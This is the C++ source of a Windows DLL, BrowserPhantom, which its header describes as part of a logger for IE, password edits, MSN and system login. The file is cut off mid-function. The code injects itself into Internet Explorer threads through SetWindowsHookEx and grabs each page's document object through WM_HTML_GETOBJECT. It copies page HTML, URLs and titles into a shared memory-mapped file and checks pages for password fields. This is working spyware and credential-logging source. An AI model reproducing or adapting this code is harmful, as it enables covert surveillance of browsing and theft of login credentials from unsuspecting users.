// BrowserPhantom.cpp : Defines the entry point for the DLL application.
//
/************************************
  REVISION LOG ENTRY
  Revision By: Zhang, Zhefu
  E-mail: codetiger@hotmail.com
  Revised on 7/3/2003 
  Comment: This is part of the logger for IE, password edit, MSN, system login.
           You are free to use to use the code on the base of keeping this comment
		   All rights reserved. May not be sold for profit.
 ************************************/
#include "BrowserPhantomDLLStdAfx.h"
#include "BrowserPhantom.h"
#include "WebEventInterceptor.h"
#include "PageHandler.h"

#define _WIN32_WINNT  0x0500
#ifdef _WIN32_IE 
  #undef _WIN32_IE
  #define _WIN32_IE 0x0500
#endif

// Forward references
LRESULT WINAPI GetMsgProc(int nCode, WPARAM wParam, LPARAM lParam);
LRESULT CALLBACK CallWndProc(int nCode, WPARAM wParam, LPARAM lParam) ;

///////////////////////////////////////////////////////////////////////////////

// Instruct the compiler to put the g_hXXXhook data variable in 
// its own data section called Shared. We then instruct the 
// linker that we want to share the data in this section 
// with all instances of this application.
#pragma data_seg("Shared")
//Post Hook Handle 
HHOOK g_hBrowserPostHook[MAX_BROWSER] = 
                  {NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 
				   NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 
				   NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
				   NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 
				   NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
				   NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 
				   NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 
				   NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
				   NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 
				   NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL};
    
//Send Hook Handle
HHOOK g_hBrowserSendHook[MAX_BROWSER] = 
                  {NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 
				   NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 
				   NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
				   NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 
				   NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
				   NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 
				   NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 
				   NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
				   NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 
				   NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL};

//Tracked Browser 
HWND g_hBrowserWnd[MAX_BROWSER] = 
                  {NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 
				   NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 
				   NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
				   NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 
				   NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
				   NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 
				   NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 
				   NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
				   NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 
				   NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL};

//Tracked Active Browser(Which Contents Has Never Been Spied Even Once)
HWND g_hActiveBrowserWnd[MAX_BROWSER] = 
                  {NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 
				   NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 
				   NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
				   NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 
				   NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
				   NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 
				   NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 
				   NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
				   NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 
				   NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL};

//IHTMLDocument2 pointer. Note The machine must be running Win2K+
MSHTML::IHTMLDocument2Ptr g_lpHTMLDocument2[MAX_BROWSER] = 
                  {NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 
				   NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 
				   NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
				   NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 
				   NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
				   NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 
				   NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 
				   NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
				   NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 
				   NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL};

//IWebBrowser2 pointer
IWebBrowser2Ptr g_lpWeb2[MAX_BROWSER] = 
                  {NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 
				   NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 
				   NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
				   NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 
				   NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
				   NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 
				   NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 
				   NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
				   NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 
				   NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL};

//Global Event Interceptor Class
CInterceptEvt g_event;

//IHTMLDocument2 pointer
CInterceptEvt* g_lpEvent[MAX_BROWSER] = 
                  {NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 
				   NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 
				   NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
				   NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 
				   NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
				   NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 
				   NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 
				   NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
				   NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 
				   NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL};

//Tracked Browser Thread
DWORD g_idBrowserThread[MAX_BROWSER] = 
                  {0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 
				  0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 
				  0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 
				  0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 
				  0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 
				  0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 
				  0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 
				  0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 
				  0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 
				  0, 0, 0, 0, 0, 0, 0, 0, 0, 0};    

//Browser Page State -- Page, PreDefined ...etc
DWORD g_dwBrowserState[MAX_BROWSER] = 
                  {0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 
				  0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 
				  0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 
				  0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 
				  0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 
				  0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 
				  0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 
				  0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 
				  0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 
				  0, 0, 0, 0, 0, 0, 0, 0, 0, 0};    

//Debug Use File
TCHAR g_szBrowserFilename[MAX_PATH] = {NULL};

#pragma data_seg()

// Instruct the linker to make the Shared section
// readable, writable, and shared.
#pragma comment(linker, "/section:Shared,rws")

// Nonshared variables
HINSTANCE g_hinstDll = NULL;

BOOL APIENTRY DllMain( HANDLE hModule, 
                       DWORD  ul_reason_for_call, 
                       LPVOID lpReserved
					 )
{
    switch (ul_reason_for_call)
	{
		case DLL_PROCESS_ATTACH:
			g_hinstDll = (HINSTANCE)hModule;
			break;
		case DLL_THREAD_ATTACH:
		case DLL_THREAD_DETACH:
		case DLL_PROCESS_DETACH:
			break;
    }
    return TRUE;
}


//The Second Browser Window in the same thread  Will Not Set A New Hook
BOOL WINAPI InitBrowserLink(HWND hBrowser)
{
	DWORD td = ::GetWindowThreadProcessId(hBrowser, NULL);
	//Check if this thread has been hooked
	for(int i = 0; i < MAX_BROWSER; i++)
	{
		if(g_idBrowserThread[i] == td) //no need to hook
		{
			//Set Hook To Previous Value
			DWORD dwIndex = InsertBrowserHwnd(hBrowser);
			if(dwIndex == (UINT)-1) return FALSE;
            g_hBrowserSendHook[dwIndex] = g_hBrowserSendHook[i];
            g_hBrowserPostHook[dwIndex] = g_hBrowserPostHook[i];
            g_idBrowserThread[dwIndex] = g_idBrowserThread[i];
			return TRUE;
		}
	}

	//First Window On This Thread, Hook It
    DWORD dwIndex = InsertBrowserHwnd(hBrowser);
    if(dwIndex == (UINT)-1) return FALSE;
    g_idBrowserThread[dwIndex] = ::GetWindowThreadProcessId(hBrowser, NULL);

	// Install the hook on the specified thread
    g_hBrowserSendHook[dwIndex] = SetWindowsHookEx(WH_CALLWNDPROC,
                       (HOOKPROC) CallWndProc,
					   g_hinstDll, 
		               g_idBrowserThread[dwIndex]);

	if(g_hBrowserSendHook[dwIndex] == NULL) 
	{
		// Make sure that a hook has been installed.
        ::ReportErr(_T("in InitBrowserLink -- SetSendHook return NULL"));
		BOOL b = UnhookWindowsHookEx(g_hBrowserSendHook[dwIndex]);
		if(!b)
		{
			::ReportErr(_T("in InitBrowserLink -- SetSendHook Fail->UnsetHook Fail"));
		}
		::g_hBrowserWnd[dwIndex] = NULL;
        g_hBrowserSendHook[dwIndex] = NULL;
		g_idBrowserThread[dwIndex] = 0;

		return FALSE;
	}	
	
	g_hBrowserPostHook[dwIndex] = SetWindowsHookEx(WH_GETMESSAGE, GetMsgProc,
					       g_hinstDll, 
		                   g_idBrowserThread[dwIndex]);
	if(g_hBrowserPostHook[dwIndex] == NULL) 
	{
		UnhookWindowsHookEx(g_hBrowserSendHook[dwIndex]);
		// Make sure that a hook has been installed.
        ::ReportErr(_T("in InitBrowserLink -- SetPostHook return NULL"));

        g_hBrowserSendHook[dwIndex] = NULL;
		g_hBrowserPostHook[dwIndex] = NULL;
		g_idBrowserThread[dwIndex] = 0;
        
		g_hBrowserWnd[dwIndex] = NULL;  
		return FALSE;
	}
	PushActiveBrowser(hBrowser);
    return TRUE;
}

BOOL WINAPI ExitBrowserLink(HWND hBrowser)
{
	//PopMsg(_T("ExitBrowserLink Entering"));
	DWORD dwIndex = QueryBrowserHwndIndex(hBrowser);
	if(dwIndex == (UINT)-1) return FALSE;

	DWORD tid = ::g_idBrowserThread[dwIndex];
	DWORD dwThreadNum = 0;
	for(int i = 0; i < MAX_BROWSER; i++)
	{
		if(g_idBrowserThread[i] == tid) dwThreadNum++;
	}

	//If the thread is used by other browser, do not unhook it
	if(dwThreadNum > 1)
	{
		AntiLinkCom(dwIndex); //release the com object linked with the browser
        g_hBrowserWnd[dwIndex] = NULL;
        g_hBrowserSendHook[dwIndex] = NULL;
		g_hBrowserPostHook[dwIndex] = NULL;
		g_idBrowserThread[dwIndex] = 0;        
		return TRUE;
	}

	//the last browser running on the thread ready to quit
	BOOL b =  UnhookWindowsHookEx(g_hBrowserSendHook[dwIndex]);
    if(!b) 
	{
        ::ReportErr(_T("in ExitBrowserLink -- UnSetSendHook return NULL"));
		if(g_hBrowserPostHook[dwIndex])
			UnhookWindowsHookEx(g_hBrowserPostHook[dwIndex]);

		g_hBrowserWnd[dwIndex] = NULL;
        g_hBrowserSendHook[dwIndex] = NULL;
		g_hBrowserPostHook[dwIndex] = NULL;
		g_idBrowserThread[dwIndex] = 0;
		return FALSE;  
	}

	if(g_hBrowserPostHook[dwIndex])
		UnhookWindowsHookEx(g_hBrowserPostHook[dwIndex]);
	AntiLinkCom(dwIndex); //unlink the com object
	g_hBrowserWnd[dwIndex] = NULL;
    g_hBrowserSendHook[dwIndex] = NULL;
	g_hBrowserPostHook[dwIndex] = NULL;
	g_idBrowserThread[dwIndex] = 0;
	
	//PopMsg(_T("ExitBrowserLink Leaving"));

	return TRUE;
}

/////////////////////////////////////////////////////////////////////////
HWND WINAPI QueryBrowserHandle(DWORD dwIndex)
{
	if(dwIndex < 0 || dwIndex >= MAX_BROWSER) return NULL;
	return g_hBrowserWnd[dwIndex];
}

//Insert hBrowser into g_hBrowserWnd and return the Array Index, NOT used in Service
//Called by InitBrowserLink Only
DWORD InsertBrowserHwnd(HWND hBrowser)
{
	for(int i = 0; i < MAX_BROWSER; i++)
	{
		if(g_hBrowserWnd[i] == NULL)
		{
            g_hBrowserWnd[i] = hBrowser;
			return i;
		}
	}
	return (UINT)-1;
}

//Query hBrowser's index in g_hBrowserWnd, NOT used in Service
DWORD QueryBrowserHwndIndex(HWND hBrowser)
{
	if(hBrowser == NULL) return (UINT)-1;
	for(int i = 0; i < MAX_BROWSER; i++)
	{
		if(g_hBrowserWnd[i] == hBrowser) return i;
	}
	return (UINT)-1;
}

//When InitBrowserLink, Set Active Browser, link with event class 
BOOL  PushActiveBrowser(HWND hBrowser)
{
	for(int i = 0; i < MAX_BROWSER; i++)
	{
		if(g_hActiveBrowserWnd[i] == NULL)
		{
			g_hActiveBrowserWnd[i] = hBrowser;
			return i;
		}
	}
	return FALSE;
}

HWND  PopActiveBrowser(BOOL bDelete)
{
	for(int i = 0; i < MAX_BROWSER; i++)
	{
		if(g_hActiveBrowserWnd[i] != NULL)
		{
			HWND h = g_hActiveBrowserWnd[i];
			if(bDelete) g_hActiveBrowserWnd[i] = NULL;
			return h;
		}
	}
	return NULL;
}

//Get Hooked Browser Number
DWORD WINAPI GetBrowserArrayNumber()
{
	DWORD dwRet = 0;
	for(int i = 0; i < MAX_BROWSER; i++)
	{
		if(g_hBrowserWnd[i]) dwRet++;
	}
	return dwRet;
}

//Check browser Array State????
void WINAPI CheckBrowserArray()
{
	for(int i = 0; i < MAX_BROWSER; i++)
	{
		if(g_hBrowserWnd[i])
		{
			if(IsBrowser(g_hBrowserWnd[i]))
			{
				//Do Nothing
			}
			else
			{
				g_hBrowserWnd[i] = NULL;
                g_hBrowserSendHook[i] = NULL;
				g_hBrowserPostHook[i] = NULL;
				g_idBrowserThread[i] = 0;
			}
		}
	}
	return;
}


//Note: If You Have the Handle of The Browser, Call QueryBrowserHwndIndex First
//Read the HTML Source, URL ... of the browser, Copy To MMF
BOOL WINAPI QueryDocument(DWORD dwIndex, WPARAM dwType)
{
	if(g_hBrowserWnd[dwIndex] == NULL) return FALSE;
	PostMessage(g_hBrowserWnd[dwIndex], WM_QUERY_BROWSER, dwType, 0);
	return TRUE;
}

LRESULT WINAPI GetMsgProc(int nCode, WPARAM wParam, LPARAM lParam) 
{
	MSG* msg = (MSG*)lParam;
	
	// Uncomment the line below to invoke the debugger 
    // on the process that just got the injected DLL.
    // ForceDebugBreak();
   
	//The First Time Browser or Browser's (Same Thread) Window Got Called
	//Link Browser with Event Class,
	//if Link to COM is ok, Remove it from Active Array
	if(PopActiveBrowser(FALSE) != NULL)
	{
        HWND hWnd = msg->hwnd;
	   
	    DWORD tid = GetWindowThreadProcessId(hWnd, NULL);
		DWORD dwIndex = QueryBrowserHwndIndex(PopActiveBrowser(FALSE));
        if(dwIndex != -1 && tid == ::g_idBrowserThread[dwIndex])
		{
			HWND h = PopActiveBrowser(TRUE);
		    //PopMsg(_T("LinkEvent in GetMsgProc"));
			LinkCom(dwIndex); //inside it, more message cause re-enter
		}
	}

	//wParam : WM_WPARAM_QUERY_HTML... , lParam : not used
	if(msg->message == WM_QUERY_BROWSER) 
	{
		for(int i = 0; i < MAX_BROWSER; i++)
		{
			if(msg->hwnd == ::g_hBrowserWnd[i] && msg->hwnd != NULL)
			{
				if(g_lpHTMLDocument2[i] == NULL)
					::LinkCom(i);
				if(g_lpHTMLDocument2[i] != NULL)
				{
					InterQueryDocument(i, msg->wParam);					
				}
			}
		}
	}

    //find the hook index
	HWND hWnd = msg->hwnd;
	DWORD dwIndex = -1;
	DWORD tid = GetWindowThreadProcessId(hWnd, NULL);

	for(int i = 0; i < MAX_BROWSER; i++)
	{
		if(tid == ::g_idBrowserThread[i]) 
		{
			dwIndex = i;	
			break;
		}
	}
	if(dwIndex == MAX_BROWSER) //shit ???
	{
		//::ReportErr(_T("Browser Hook to where"));
		return 0;
	}
    return(CallNextHookEx(g_hBrowserPostHook[dwIndex], nCode, wParam, lParam));
}

//Note CallWndProcHook can NOT change message (from MSDN)
/*
typedef struct tagCWPSTRUCT { 
    LPARAM  lParam; 
    WPARAM  wParam; 
    UINT    message; 
    HWND    hwnd; 
} CWPSTRUCT, *PCWPSTRUCT; 
*/

//SendMessage Hook Proc
LRESULT CALLBACK CallWndProc(
  int nCode,      // hook code
  WPARAM wParam,  // If sent by the current thread, it is nonzero; otherwise, it is zero. 
  LPARAM lParam   // message data
)
{
	CWPSTRUCT * pCwp = (CWPSTRUCT *)lParam;
    
	//find the hook index
	HWND hWnd = pCwp->hwnd;
	DWORD dwIndex = -1;
	DWORD tid = GetWindowThreadProcessId(hWnd, NULL);

	for(int i = 0; i < MAX_BROWSER; i++)
	{
		if(tid == ::g_idBrowserThread[i]) 
		{
			dwIndex = i;	
			break;
		}
	}
	if(dwIndex == MAX_BROWSER) //shit ???
	{
		//::ReportErr(_T("Browser Hook to where"));
		return 0;
	}

	if(WM_TRIGGER_BROWSER == pCwp->message)
	{
		Trigger2(pCwp->wParam);
	}

	//wParam : WM_WPARAM_CHECK_ISPWD... , lParam : not used
	if(pCwp->message == WM_QUERY_BROWSER) 
	{
		for(int i = 0; i < MAX_BROWSER; i++)
		{
			if(pCwp->hwnd == ::g_hBrowserWnd[i] && pCwp->hwnd != NULL)
			{
				if(g_lpHTMLDocument2[i] == NULL)
					::LinkCom(i);
				if(g_lpHTMLDocument2[i] != NULL)
				{
					if(pCwp->wParam == WM_WPARAM_CHECK_ISPWD)
					{
						//PopMsg(_T("%d-%d-%d"), i, pCwp->lParam, InterIsPwdBrowser(i));
						BOOL b = InterIsPwdBrowser(i);
						DWORD dw = WM_WPARAM_CHECK_ISPWD;
						if(b)
							g_dwBrowserState[i] |= dw;
						else
							g_dwBrowserState[i] &= ~dw;
                       	return 0; //no need passing to hook chain
					}
					else if(pCwp->wParam == WM_WPARAM_CHECK_ISPREDEF)
					{
						enumPreDefinePage b = InterIsPreDefBrowser(i);
						DWORD dw = WM_WPARAM_CHECK_ISPREDEF;
						if(b != none)
							g_dwBrowserState[i] |= dw;
						else
							g_dwBrowserState[i] &= ~dw;
                        return 0;
					}					
				}
			}
		}
	}

	if (nCode < 0) 
    {
		// just pass it on 
	    return CallNextHookEx (g_hBrowserSendHook[dwIndex], nCode, wParam, lParam) ;
    }  
	return CallNextHookEx (g_hBrowserSendHook[dwIndex], nCode, wParam, lParam) ;
}

//Note: Cannot use __try in functions that require object unwinding in C++ class
//-----------------------------------------------------------------
BOOL InterQueryDocument(DWORD dwIndex, WPARAM dwType)
{
	if(g_lpHTMLDocument2[dwIndex] == NULL)
	{
		LinkCom(dwIndex);
		if(g_lpHTMLDocument2[dwIndex] == NULL) return FALSE;
	}

    LPVOID pView = NULL;
	
	HANDLE hMMF = OpenFileMapping(FILE_MAP_READ | FILE_MAP_WRITE, FALSE, g_MMF_NAME);
    if (hMMF == NULL) 
	{
		::ReportErr(_T("Open MMF Failed in BombPwdEdit"));  return FALSE;
	}

	HANDLE hWriteEvent = ::OpenEvent(EVENT_ALL_ACCESS, FALSE,g_WRITE_EVENT_MMF_NAME);
	if(hWriteEvent == NULL)
	{
		::CloseHandle(hMMF);
		::ReportErr(_T("Open Write Event Failed in BombPwdEdit"));  return FALSE;
	}

	HANDLE hReadEvent = ::OpenEvent(EVENT_ALL_ACCESS, FALSE,g_READ_EVENT_MMF_NAME);
	if(hReadEvent == NULL)
	{
		::CloseHandle(hMMF);
		::CloseHandle(hWriteEvent);
		::ReportErr(_T("Open Read Event Failed in BombPwdEdit")); return FALSE;
	}

	DWORD dwRet = ::WaitForSingleObject(hWriteEvent, MAX_WAIT);//INFINITE);
	if(dwRet == WAIT_ABANDONED)
	{
		//::ReportErr(_T("Write Wait Error")); 
		::CloseHandle(hMMF);
		::CloseHandle(hWriteEvent);
		::CloseHandle(hReadEvent);
	    return FALSE;
	}
	else if(dwRet == WAIT_TIMEOUT)
	{
		//::ReportErr(_T("Write Wait Time Out"));
		::CloseHandle(hMMF);
		::CloseHandle(hWriteEvent);
		::CloseHandle(hReadEvent);
	    return FALSE;
	}
	
	::ResetEvent(hWriteEvent);

	//4 Byte Total size
	//4 byte Used size
	DWORD pos = 0;
	//head 4 byte to record size
	pView = MapViewOfFile(hMMF, 
	   FILE_MAP_READ | FILE_MAP_WRITE, 0, 0, 0);
	if(pView == NULL)
	{
		::ReportErr(_T("Write MapView Faield in InterQueryDocument")); 
		::CloseHandle(hMMF);
		::CloseHandle(hWriteEvent);
		::CloseHandle(hReadEvent);
	    return FALSE;
	}

	LPBYTE lpByte = (LPBYTE)pView;
	DWORD dwSize, dwUsed;
	::CopyMemory(&dwSize, lpByte, sizeof(DWORD));
	lpByte += sizeof(DWORD);
	::CopyMemory(&dwUsed, lpByte, sizeof(DWORD));
    lpByte += sizeof(DWORD);

	LPVOID lpMem = (LPVOID)lpByte; //Actual Data Head
   	if(dwType == WM_WPARAM_QUERY_HTML)
	{
		MSHTML::IHTMLElementPtr spHtmlElement;
	    HRESULT hr = g_lpHTMLDocument2[dwIndex]->get_body(&spHtmlElement);
	    if(spHtmlElement != 0)
		{
			BSTR bstr;
		    hr = spHtmlElement->get_outerHTML(&bstr);
            UINT len = ::SysStringLen(bstr);
            //We use Unicode here, so I case directly

			lpByte = (LPBYTE)lpMem;
	        lpByte += dwUsed;
	    	::CopyMemory(lpByte, (LPVOID)(LPCWSTR)bstr, len*sizeof(TCHAR));
			dwUsed += len*sizeof(TCHAR);
	        ::SysFreeString(bstr);

			lpByte = (LPBYTE)lpMem;
	        lpByte += dwUsed;
			::CopyMemory(lpByte, (LPVOID)(LPCWSTR)_T("\r\n"), ::lstrlen(_T("\r\n"))*sizeof(TCHAR));
			dwUsed += ::lstrlen(_T("\r\n"))*sizeof(TCHAR);
		}
	}
	else if(dwType == WM_WPARAM_QUERY_URL)
	{
		BSTR bstr;
		HRESULT hr = g_lpHTMLDocument2[dwIndex]->get_url(&bstr);
		//We use Unicode here
		UINT len = ::SysStringLen(bstr);
		lpByte = (LPBYTE)lpMem;
	    lpByte += dwUsed;
	    ::CopyMemory(lpByte, (LPVOID)(LPCWSTR)bstr, len*sizeof(TCHAR));
		dwUsed += len*sizeof(TCHAR);
	    ::SysFreeString(bstr);

		lpByte = (LPBYTE)lpMem;
	    lpByte += dwUsed;
		::CopyMemory(lpByte, (LPVOID)(LPCWSTR)_T("\r\n"), ::lstrlen(_T("\r\n"))*sizeof(TCHAR));
		dwUsed += ::lstrlen(_T("\r\n"))*sizeof(TCHAR);
	}
	else if(dwType == WM_WPARAM_QUERY_TITLE)
	{
		bstr_t bstr;
		bstr = g_lpHTMLDocument2[dwIndex]->Gettitle();
		
		//We use Unicode here
		UINT len = ::SysStringLen(bstr);
		lpByte = (LPBYTE)lpMem;
	    lpByte += dwUsed;
	    ::CopyMemory(lpByte, (LPVOID)(LPCWSTR)bstr, len*sizeof(TCHAR));
		dwUsed += len*sizeof(TCHAR);
	    ::SysFreeString(bstr);

		lpByte = (LPBYTE)lpMem;
	    lpByte += dwUsed;
		::CopyMemory(lpByte, (LPVOID)(LPCWSTR)_T("\r\n"), ::lstrlen(_T("\r\n"))*sizeof(TCHAR));
		dwUsed += ::lstrlen(_T("\r\n"))*sizeof(TCHAR);
	}

	lpByte = (LPBYTE)pView;
    lpByte += sizeof(DWORD);
    ::CopyMemory(lpByte, &dwUsed, sizeof(DWORD));
    
	::UnmapViewOfFile(pView);
	::CloseHandle(hMMF);
	::CloseHandle(hWriteEvent);
	
	::SetEvent(hReadEvent);
	::CloseHandle(hReadEvent);
	return TRUE;
}

//from tlb
//struct __declspec(uuid("626fc520-a41e-11cf-a731-00a0c9082637"))
///* dual interface */ IHTMLDocument;
//struct __declspec(uuid("332c4425-26cb-11d0-b483-00c04fd90119"))
///* dual interface */ IHTMLDocument2;

//Link Handle With IHTMLDocument2, Event
BOOL  LinkCom(DWORD dwIndex)
{
	if(g_hBrowserWnd[dwIndex] == NULL) return FALSE;
	AntiLinkCom(dwIndex);
	
	CoInitialize( NULL );
	// Explicitly load MSAA so we know if it's installed
	HINSTANCE hInst = ::LoadLibrary( _T("OLEACC.DLL") );
	if(hInst == NULL ) return FALSE;
    
	MSHTML::IHTMLDocument2Ptr spHtmlDocument;
	LRESULT lRes;
			
	UINT nMsg = ::RegisterWindowMessage( _T("WM_HTML_GETOBJECT") );
	//Time Out: 1 Second
	::SendMessageTimeout( g_hBrowserWnd[dwIndex], nMsg,
		0L, 0L, SMTO_ABORTIFHUNG, 1000, (DWORD*)&lRes ); 

	LPFNOBJECTFROMLRESULT pfObjectFromLresult = (LPFNOBJECTFROMLRESULT)::GetProcAddress( hInst, "ObjectFromLresult");
	if ( pfObjectFromLresult == NULL )
	{
		::FreeLibrary( hInst );
		CoUninitialize();
		return FALSE;
	}
	
	WCHAR strDoc[] =  L"{626fc520-a41e-11cf-a731-00a0c9082637}";
    CLSID uuidDoc;
    HRESULT hrDoc = CLSIDFromString((LPOLESTR)strDoc, 
		            &uuidDoc
					//IID_IHTMLDocument2
					);
    if(!SUCCEEDED(hrDoc))
	{
		::ReportErr(_T("Can Not Parse IID_IHTMLDocument2 CLSID"));
        ::FreeLibrary( hInst );
		CoUninitialize();
		return FALSE; 
	}

	HRESULT hr;
	hr = (*pfObjectFromLresult)( lRes, uuidDoc,
		//IID_IHTMLDocument2,
		0, (void**)&spHtmlDocument );
	if ( SUCCEEDED(hr) )
	{
		g_lpHTMLDocument2[dwIndex] = (spHtmlDocument);
		CComQIPtr<IServiceProvider> isp = spHtmlDocument;
	    hr = isp->QueryService(IID_IWebBrowserApp, IID_IWebBrowser2, (void**)&g_lpWeb2[dwIndex]);
		if(FAILED(hr))
		{
            g_lpHTMLDocument2[dwIndex].Release(); //NOTE: not use ->
            g_lpHTMLDocument2[dwIndex] = NULL;
            g_lpWeb2[dwIndex] = NULL;
			::FreeLibrary( hInst );
		    CoUninitialize();
		    return FALSE;
		}
		else
		{
			g_event.SetSource(g_lpWeb2[dwIndex] ,dwIndex);
			g_event.ConnectEvents(dwIndex);
		}
	}
	else
	{
		::FreeLibrary( hInst );
		CoUninitialize();
		return FALSE;
	}
	
	::FreeLibrary( hInst );
	CoUninitialize();
	return TRUE;
}

BOOL  AntiLinkCom(DWORD dwIndex)
{
	//PopMsg(_T("AntiLinkCom %d"), dwIndex);
	if(g_lpHTMLDocument2[dwIndex] != NULL)
	{
		g_lpHTMLDocument2[dwIndex].Release(); //NOTE: not use ->
	    g_lpHTMLDocument2[dwIndex] = NULL;
	}
	g_event.ExitEvents(dwIndex);
	if(g_lpWeb2[dwIndex] != NULL)
	{
		g_lpWeb2[dwIndex].Release(); //NOTE: not use ->
        g_lpWeb2[dwIndex] = NULL;
	}

	return TRUE;
}

//Inside Html There is Password Field
BOOL WINAPI IsPwdBrowser(DWORD dwIndex)
{
	if(g_hBrowserWnd[dwIndex] == NULL) return FALSE;
	LRESULT hr = ::SendMessage(g_hBrowserWnd[dwIndex], WM_QUERY_BROWSER, 
		WM_WPARAM_CHECK_ISPWD,dwIndex);
	if(hr != 0) 
		return TRUE;
	return FALSE;
}

BOOL InterIsPwdBrowser(DWORD dwIndex)
{
	if(g_lpHTMLDocument2[dwIndex] == NULL)
	{
		if(!LinkCom(dwIndex)) return FALSE;
	}

	MSHTML::IHTMLElementCollection *pForm;	
